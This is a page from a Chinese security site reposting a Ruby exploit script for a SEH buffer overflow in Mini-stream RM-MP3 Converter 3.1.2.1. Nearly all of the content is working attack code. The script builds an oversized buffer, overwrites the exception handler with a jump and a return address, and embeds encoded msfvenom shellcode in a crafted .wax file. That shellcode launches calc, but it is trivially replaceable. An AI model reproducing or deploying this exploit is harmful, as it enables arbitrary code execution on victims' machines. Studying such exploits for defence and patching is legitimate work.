首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
来源:mind1355[at]gmail.com 作者:Ramli 发布时间:2014-11-27  
#!/usr/bin/env ruby
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
# Date: 26.11.2014
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Vendor Homepage: not valid anymore
# Software Link: not available
# Version: 3.1.2.1.2010.03.30
# Discovery: ZoRLu / zorlu@milw00rm.com
# Tested on: Microsoft Windows XP [Version 5.1.2600]
  
filename = "3-1-2-1-gb.wax"
  
seh  = 43501
buff = "\x41" * 45000
nops = "\x90" * 16
  
# ./msfvenom -p windows/exec CMD=calc EXITFUNC=thread -b "\x00\x0a\x0d\x0c\x20" -e x86/shikata_ga_nai -f ruby
sc =
"\xbe\x97\xd4\x64\xe7\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9" +
"\xb1\x32\x83\xc2\x04\x31\x72\x0e\x03\xe5\xda\x86\x12\xf5" +
"\x0b\xcf\xdd\x05\xcc\xb0\x54\xe0\xfd\xe2\x03\x61\xaf\x32" +
"\x47\x27\x5c\xb8\x05\xd3\xd7\xcc\x81\xd4\x50\x7a\xf4\xdb" +
"\x61\x4a\x38\xb7\xa2\xcc\xc4\xc5\xf6\x2e\xf4\x06\x0b\x2e" +
"\x31\x7a\xe4\x62\xea\xf1\x57\x93\x9f\x47\x64\x92\x4f\xcc" +
"\xd4\xec\xea\x12\xa0\x46\xf4\x42\x19\xdc\xbe\x7a\x11\xba" +
"\x1e\x7b\xf6\xd8\x63\x32\x73\x2a\x17\xc5\x55\x62\xd8\xf4" +
"\x99\x29\xe7\x39\x14\x33\x2f\xfd\xc7\x46\x5b\xfe\x7a\x51" +
"\x98\x7d\xa1\xd4\x3d\x25\x22\x4e\xe6\xd4\xe7\x09\x6d\xda" +
"\x4c\x5d\x29\xfe\x53\xb2\x41\xfa\xd8\x35\x86\x8b\x9b\x11" +
"\x02\xd0\x78\x3b\x13\xbc\x2f\x44\x43\x18\x8f\xe0\x0f\x8a" +
"\xc4\x93\x4d\xc0\x1b\x11\xe8\xad\x1c\x29\xf3\x9d\x74\x18" +
"\x78\x72\x02\xa5\xab\x37\xec\x47\x7e\x4d\x85\xd1\xeb\xec" +
"\xc8\xe1\xc1\x32\xf5\x61\xe0\xca\x02\x79\x81\xcf\x4f\x3d" +
"\x79\xbd\xc0\xa8\x7d\x12\xe0\xf8\x1d\xf5\x72\x60\xe2"
  
buff[seh-4,4] = "\xeb\x0e\x90\x90"
buff[seh,4] = [0x10031659].pack("V").force_encoding("utf-8")
buff[seh+4,nops.size] = nops
buff[seh+(4+nops.size),sc.size] = sc
  
File.open(filename,"wb") do |fp|
  fp.write(buff)
  fp.close
  puts "Exploit file created: #{filename} size: #{buff.size}"
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Pandora FMS SQLi Remote Code E
·Elipse E3 HTTP Denial of Servi
·Android WAPPushManager - SQL I
·KMPlayer 3.9.1.130 Denial Of S
·Device42 WAN Emulator 2.3 Trac
·PHP 5.x / Bash Shellshock Proo
·Device42 WAN Emulator 2.3 Ping
·Mozilla Firefox 3.6 mChannel U
·Slider Revolution/Showbiz Pro
·All-in-One WP Migration 2.0.2
·Android Settings Pendingintent
·Linux Kernel libfutex Local Ro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved